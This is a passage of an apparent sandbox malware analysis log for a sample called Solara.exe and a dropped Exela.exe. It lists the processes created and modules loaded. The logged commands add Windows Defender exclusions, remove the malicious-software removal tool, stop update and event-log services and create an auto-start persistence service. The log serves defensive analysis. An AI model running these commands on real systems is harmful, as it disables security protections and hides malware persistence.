Source: C:\Users\user\AppData\Local\Temp\Solara.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Solara.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\Users\user\AppData\Local\Temp\Solara.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
Source: C:\Windows\System32\powercfg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Solara.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Source: C:\Windows\System32\powercfg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Solara.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
Source: C:\Windows\System32\powercfg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Solara.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "PGYNROQK"
Source: C:\Windows\System32\powercfg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Solara.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "PGYNROQK" binpath= "C:\ProgramData\hoyktorfcbbz\rdqanwpudvuj.exe" start= "auto"
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Solara.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog
Source: C:\Users\user\AppData\Local\Temp\Solara.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "PGYNROQK"
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\ProgramData\hoyktorfcbbz\rdqanwpudvuj.exe C:\ProgramData\hoyktorfcbbz\rdqanwpudvuj.exe
Source: C:\ProgramData\hoyktorfcbbz\rdqanwpudvuj.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\hoyktorfcbbz\rdqanwpudvuj.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\ProgramData\hoyktorfcbbz\rdqanwpudvuj.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\ProgramData\hoyktorfcbbz\rdqanwpudvuj.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\hoyktorfcbbz\rdqanwpudvuj.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\hoyktorfcbbz\rdqanwpudvuj.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\hoyktorfcbbz\rdqanwpudvuj.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\hoyktorfcbbz\rdqanwpudvuj.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\ProgramData\hoyktorfcbbz\rdqanwpudvuj.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
Source: C:\ProgramData\hoyktorfcbbz\rdqanwpudvuj.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Source: C:\Windows\System32\powercfg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\hoyktorfcbbz\rdqanwpudvuj.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
Source: C:\Windows\System32\powercfg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\powercfg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\hoyktorfcbbz\rdqanwpudvuj.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe
Source: C:\Windows\System32\powercfg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\hoyktorfcbbz\rdqanwpudvuj.exe | Process created: C:\Windows\System32\conhost.exe conhost.exe
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\Solara.exe "C:\Users\user\AppData\Local\Temp\Solara.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Local\Temp\Solara.exe "C:\Users\user\AppData\Local\Temp\Solara.exe"
Source: C:\Users\user\AppData\Local\Temp\Solara.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Users\user\AppData\Local\Temp\Solara.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\Solara.exe "C:\Users\user\AppData\Local\Temp\Solara.exe"
Source: C:\Users\user\Desktop\Solara.exe | Process created: C:\Users\user\AppData\Local\Temp\Exela.exe "C:\Users\user~1\AppData\Local\Temp\Exela.exe"
Source: C:\Users\user\AppData\Local\Temp\Exela.exe | Process created: C:\Users\user\AppData\Local\Temp\Exela.exe "C:\Users\user~1\AppData\Local\Temp\Exela.exe"
Source: C:\Users\user\AppData\Local\Temp\Solara.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Users\user\AppData\Local\Temp\Exela.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Exela.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\Conhost.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Solara.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\powercfg.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\Conhost.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\svchost.exe | Process created: unknown unknown
Source: C:\Users\user\Desktop\Solara.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Solara.exe'
Source: C:\Users\user\Desktop\Solara.exe | Process created: C:\Users\user\AppData\Local\Temp\Solara.exe "C:\Users\user~1\AppData\Local\Temp\Solara.exe"
Source: C:\Users\user\Desktop\Solara.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Exela.exe'
Source: C:\Users\user\Desktop\Solara.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Solara.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Users\user\AppData\Local\Temp\Solara.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Users\user\AppData\Local\Temp\Solara.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
Source: C:\Users\user\AppData\Local\Temp\Solara.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
Source: C:\Users\user\AppData\Local\Temp\Solara.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
Source: C:\Users\user\AppData\Local\Temp\Solara.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits
Source: C:\Users\user\AppData\Local\Temp\Solara.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc
Source: C:\Users\user\AppData\Local\Temp\Solara.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\Users\user\AppData\Local\Temp\Solara.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
Source: C:\Users\user\AppData\Local\Temp\Solara.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Source: C:\Users\user\AppData\Local\Temp\Solara.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
Source: C:\Users\user\AppData\Local\Temp\Solara.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "PGYNROQK"
Source: C:\Users\user\AppData\Local\Temp\Solara.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "PGYNROQK" binpath= "C:\ProgramData\hoyktorfcbbz\rdqanwpudvuj.exe" start= "auto"
Source: C:\Users\user\AppData\Local\Temp\Solara.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Solara.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "PGYNROQK"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\ProgramData\hoyktorfcbbz\rdqanwpudvuj.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\ProgramData\hoyktorfcbbz\rdqanwpudvuj.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\ProgramData\hoyktorfcbbz\rdqanwpudvuj.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
Source: C:\ProgramData\hoyktorfcbbz\rdqanwpudvuj.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
Source: C:\ProgramData\hoyktorfcbbz\rdqanwpudvuj.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
Source: C:\ProgramData\hoyktorfcbbz\rdqanwpudvuj.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits
Source: C:\ProgramData\hoyktorfcbbz\rdqanwpudvuj.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc
Source: C:\ProgramData\hoyktorfcbbz\rdqanwpudvuj.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\ProgramData\hoyktorfcbbz\rdqanwpudvuj.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
Source: C:\ProgramData\hoyktorfcbbz\rdqanwpudvuj.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Source: C:\ProgramData\hoyktorfcbbz\rdqanwpudvuj.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
Source: C:\ProgramData\hoyktorfcbbz\rdqanwpudvuj.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe
Source: C:\ProgramData\hoyktorfcbbz\rdqanwpudvuj.exe | Process created: C:\Windows\System32\conhost.exe conhost.exe
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Users\user\AppData\Local\Temp\Solara.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Start-Process "C:\Users\user\AppData\Local\Temp\Solara.exe" -Verb runAs
Source: C:\Users\user\AppData\Local\Temp\Solara.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Users\user\AppData\Local\Temp\Solara.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Users\user\AppData\Local\Temp\Solara.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
Source: C:\Users\user\AppData\Local\Temp\Solara.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\Solara.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\Solara.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Solara.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\Solara.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\Solara.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\Solara.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\Solara.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\Solara.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\Solara.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\Exela.exe | Process created: C:\Users\user\AppData\Local\Temp\Exela.exe "C:\Users\user~1\AppData\Local\Temp\Exela.exe"
Source: C:\Users\user\AppData\Local\Temp\Exela.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\Exela.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\Exela.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\Exela.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\Exela.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\Exela.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\Exela.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Exela.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\Exela.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\Exela.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\Exela.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\Exela.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\Exela.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\Exela.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\Exela.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\Exela.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\Exela.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Exela.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\Exela.exe | Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
                Source: C:\Users\user\Desktop\Solara.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, amsi.dll, userenv.dll, profapi.dll, windows.storage.dll, wldp.dll, msasn1.dll, gpapi.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, secur32.dll, sspicli.dll, uxtheme.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, propsys.dll, wininet.dll, microsoft.management.infrastructure.native.unmanaged.dll, mi.dll, miutils.dll, wmidcom.dll, dpapi.dll, wbemcomn.dll
                Source: C:\Users\user\AppData\Local\Temp\Solara.exe Section loaded: apphelp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, windows.storage.dll, wldp.dll, msasn1.dll, amsi.dll, userenv.dll, profapi.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, gpapi.dll, secur32.dll, sspicli.dll, uxtheme.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, propsys.dll, wininet.dll, microsoft.management.infrastructure.native.unmanaged.dll, mi.dll, miutils.dll, wmidcom.dll, dpapi.dll, wbemcomn.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, windows.storage.dll, wldp.dll, msasn1.dll, amsi.dll, userenv.dll, profapi.dll, gpapi.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, secur32.dll, sspicli.dll, uxtheme.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, propsys.dll, wininet.dll, microsoft.management.infrastructure.native.unmanaged.dll, mi.dll, miutils.dll, wmidcom.dll, dpapi.dll, wbemcomn.dll
                Source: C:\Windows\System32\wusa.exe Section loaded: dpx.dll, wtsapi32.dll, cryptsp.dll, kernel.appcore.dll, uxtheme.dll
                Source: C:\Windows\System32\powercfg.exe Section loaded: powrprof.dll, powrprof.dll, powrprof.dll, umpdc.dll, powrprof.dll, powrprof.dll, powrprof.dll, umpdc.dll, powrprof.dll, powrprof.dll, powrprof.dll, umpdc.dll, powrprof.dll, powrprof.dll, powrprof.dll, umpdc.dll
                Source: C:\ProgramData\hoyktorfcbbz\rdqanwpudvuj.exe Section loaded: apphelp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, windows.storage.dll, wldp.dll, amsi.dll, userenv.dll, profapi.dll, msasn1.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, gpapi.dll, secur32.dll, sspicli.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, propsys.dll, wininet.dll, microsoft.management.infrastructure.native.unmanaged.dll, mi.dll, miutils.dll, wmidcom.dll, dpapi.dll, wbemcomn.dll
                Source: C:\Windows\System32\wusa.exe Section loaded: dpx.dll, wtsapi32.dll, cryptsp.dll, kernel.appcore.dll
                Source: C:\Windows\System32\powercfg.exe Section loaded: powrprof.dll, powrprof.dll, powrprof.dll, umpdc.dll, powrprof.dll, powrprof.dll, powrprof.dll, umpdc.dll, powrprof.dll, powrprof.dll, powrprof.dll, umpdc.dll, powrprof.dll, powrprof.dll, powrprof.dll, umpdc.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, wldp.dll, windows.storage.dll, msasn1.dll, amsi.dll, userenv.dll, profapi.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, gpapi.dll, secur32.dll, sspicli.dll, uxtheme.dll, propsys.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll, mpr.dll, pcacli.dll, sfc_os.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, wldp.dll, amsi.dll, userenv.dll, profapi.dll, windows.storage.dll, msasn1.dll, msisip.dll, wshext.dll, gpapi.dll, appxsip.dll, opcservices.dll, secur32.dll, sspicli.dll, uxtheme.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, propsys.dll, wininet.dll, microsoft.management.infrastructure.native.unmanaged.dll, mi.dll, miutils.dll, wmidcom.dll, dpapi.dll, wbemcomn.dll
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe Section loaded: uxtheme.dll, kernel.appcore.dll, vcruntime140.dll, version.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, libffi-7.dll, iphlpapi.dll, sqlite3.dll, libcrypto-1_1.dll, libssl-1_1.dll, mswsock.dll, msasn1.dll, sbiedll.dll, dpapi.dll, kernel.appcore.dll, dnsapi.dll, rasadhlp.dll, fwpuclnt.dll
                Source: C:\Windows\System32\wusa.exe Section loaded: dpx.dll, wtsapi32.dll, cryptsp.dll, kernel.appcore.dll, uxtheme.dll
                Source: C:\Users\user\Desktop\Solara.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5E5F29CE-E0A8-49D3-AF32-7A7BDC173478}\InProcServer32
                Source: Window Recorder Window detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\Solara.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                Source: Solara.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: Solara.exe Static PE information: Virtual size of .text is bigger than: 0x100000
                Source: Solara.exe Static file information: File size 14390272 > 1048576
                Source: Solara.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0xd76a00
                Source: Solara.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_A source: Exela.exe
